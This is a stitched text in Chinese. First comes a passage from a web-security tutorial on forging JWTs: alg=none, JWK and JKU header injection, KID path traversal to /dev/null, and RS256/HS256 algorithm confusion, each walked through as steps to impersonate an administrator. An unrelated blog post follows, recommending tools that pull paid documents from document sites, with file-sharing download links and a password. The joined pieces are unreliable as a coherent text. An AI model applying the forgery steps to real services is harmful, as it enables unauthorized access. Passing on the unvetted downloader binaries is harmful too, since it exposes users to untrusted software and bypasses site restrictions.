JWT可以使用不同的算法进行签名,但也可以不签名,在这种情况下,alg参数的值会为none,代表所谓的“不安全的JWT”。 还是在访问/admin api时,提示只允许administrator访问。 解码JWT,算法存储在HEADER中的alg字段,用户名存储在PAYLOAD的sub字段: 将alg改为none,sub改为administrator,重新生成不带签名的JWT再次访问: 可以看到成功伪造了administrator的身份,访问到了/admin api。 JWT HEADER中除了alg是必填的,还有一些可选的参数,是可能被攻击者利用的。 --JWK (JSON Web Key) - 存放JWT密钥的一个JSON --JKU (JSON Web Key Set URL) - 提供一个URL,服务器从中获取一组正确的密钥 --KID (Key ID) - JWK的ID 42. JWK参数注入 // 危害性:高 普遍性:低 可利用性:高 正常情况下,服务器应该只使用有限的公钥白名单来验证JWT签名,但是配置错误的服务器可能会使用JWK中的公钥来验证JWT的签名。 如下是包含JWK例子: 攻击者可利用这种配置错误,自己生成RSA私钥对修改后的JWT进行签名,然后将对应的公钥写入JWK中,以达到伪造其他用户身份的目的。 例如在访问/admin api时,提示只允许administrator访问。 首先将sub更改为administrator。 再根据自己生成的RSA密钥,使用私钥进行签名,把公钥放到JWK中,生成新的JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 43. JKU参数注入 // 危害性:高 普遍性:低 可利用性:高 某些服务器不会直接使用header参数中的JWK提交的公钥,会使用JKU提供包含密钥的JWK集合,服务器会请求JKU提供的URL获取密钥来验证签名。 JWK集合是一个JSON,如下: 如果服务器没有校验JKU的地址,攻击者可以将其改为自己构造的URL,让服务器使用自己生成的密钥来验证签名,以达到伪造其他用户身份的目的。 还是一样,在访问/admin api时,提示只允许administrator访问。 自己生成RSA密钥,构造一个api用于返回JWK集合。 修改KID与api中的一致,sub修改为administrator,并添加JKU参数指向自己构造的api,重新生成JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 44. KID参数注入 // 危害性:高 普遍性:低 可利用性:高 服务器可以使用多个加密密钥来给不同类型的数据进行签名,不只是JWT。所以KID参数用于帮助服务器在验证签名时使用正确的密钥。密钥通常以JWK集合的方式存储,但是规范中没有定义ID的具体结构,只是开发人员自己生成的一个字符串。例如,开发人员可能使用KID参数来指向数据库中的某条数据,甚至是文件的名称。 如果KID指向的是文件的名称,又存在目录遍历的漏洞,则攻击者可能会让服务器使用其文件系统中的任意文件作为验证的密钥。 如果服务器支持使用对称加密算法签名的JWT,攻击者可以让服务器使用/dev/null文件作为验证的密钥,绝大部分linux系统都有这个文件,因为这是一个空文件,服务器读取该文件时会获得null,再使用Base64编码空字节(AA==)生成一个有效的签名,达到伪造用户身份的目的。 还是和前面一样,在访问/admin api时,提示只允许administrator访问。 生成密钥为空字节的对称加密密钥: 修改sub为administrator,再使用目录遍历,将KID参数指向/dev/null文件,以让服务器获得密钥为null,最后重新签名生成新的JWT。 再次访问/admin api,访问成功,代表伪造administrator身份成功。 45. 算法混淆 // 危害性:高 普遍性:低 可利用性:中 某些JWT库在验证签名有效性时,给HMAC对称加密的密钥和RSA非对称加密的公钥赋予了相同的变量名,伪代码如下所示: 如果攻击者通过某种方式获得了RSA的公钥,攻击者可通过将JWT签名的算法从RS256调整为HS256,并用公钥对其进行签名,达到伪造用户身份的目的。 网络安全风险层出不穷,账号就像一把可以开启企业数据资产大门的“钥匙”,任何一点疏忽都可能对企业整体业务和数据资产造成严重的安全风险。因此,完善和维护账号安全体系是企业数字化信息安全建设的关键。
-
文库下载又不能用了?别急,还有一堆办法! 现在的文库下载工具真的是用一个少一个,毕竟许多软件作者的初衷只是为了方便大家,让大家能较为轻松的获取自己想要的文档。但是有些人喜欢拿到工具后,就开始了盈利行为,为软件本身招来了不好的影响。 收了钱就要提供对应的服务,有很多倒卖的人提供不了,然后用户来骂原作者的比比皆是,或者是喷软件不好用,可这本来就是软件作者用爱发电免费分享的,没有想过要赚钱,白白辛苦了一阵子还把名声搞臭了,估计没人会愿意继续更新下去吧。 之前推荐的界面还不错的YOCO下载器,就因为种种原因永久停止维护了,不少朋友也反馈软件用不了。 一、文库下载器 今天就给大家推荐另一款软件,并分享一些在Github上寻找下载工具的办法。 先来看看新的这款小工具,名字就是文库下载器,软件作者以前也发过一版,但是失效了,字体显示也有点问题,所以在16号又更新了一次,不再需要登录,下载几百页的文件也能Hold住,同时提高了下载速度。 软件就一个单文件,打开即用。把需要的链接丢进去就好了,没错,就是这么简单。 下载完成后,会在软件所在的目录下生成一个PDF文件,需要编辑的话,可以使用之前介绍的PDF24等工具转换一下格式。 下载地址: https://www.123pan.com/s/HQeA-cE4Sh https://ghpym.lanzouv.com/b0125x6ra 密码:97ai 二、上 GitHub 扒拉 有的朋友可能会问,这个工具失效了怎么办,还有没有其他能临时顶一下的工具?这时候就可以请出最大的"男生交友网站"-GitHub了,在上面搜索对应的关键字后,切换成Python语言之后,就可以找到前人留下来的一些上古工具。 点击下载将代码下载下来(地址:https://github.com/BoyInTheSun/wks)。 使用之前要做的是先配置一下运行Python的环境,当然你也不用听着就头大,配置环境现在也就是安装一个软件事情,在安装的时候把这个按钮勾选上即可。 安装好之后,进入到下载的代码文件里面,就可以看到py结尾的文件可以使用Python打开了,当然这里还需要下载一些依赖文件,在空白处按住Shift+鼠标右键,选择在此处打开powershell窗口。 输入 pip install -r requirements.txt 等待之后。 然后按照软件给出的帮助文档使用就行了,像是演示的这份代码也可以直接下载不要登录文件。 如果有其他文库的需求,也可以找到对应的分享,按照上面的步骤运行一下,就能使用了,像是这个叫做 多种文档下载器 的分享(地址:https://github.com/rty813/doc_downloader)。 也能下载许多文档,不过用别人分享的代码需要解决很多依赖的问题,缺少啥就装啥,像是示例这个就需要加一个:python.exe -m pip install fire。还有的是使用Chrome的ChromeDriver来控制抓取的,还有版本限制,配置起来比较糟心。 不过这种好处的方法就是,有人在GitHub分享比较新的办法的时候,可以第一时间用上,也不同太担心使用的人数太多而失效。不过一个项目火了之后还会有人打包分享的。 下载地址: 三、使用稻壳下载器 地址:http://www.daokeyuedu.com/ 除了上面那些,你还可以使用稻壳阅读器的打印PDF功能,来获取一些文档的下载。平常下载一点东西是够了。
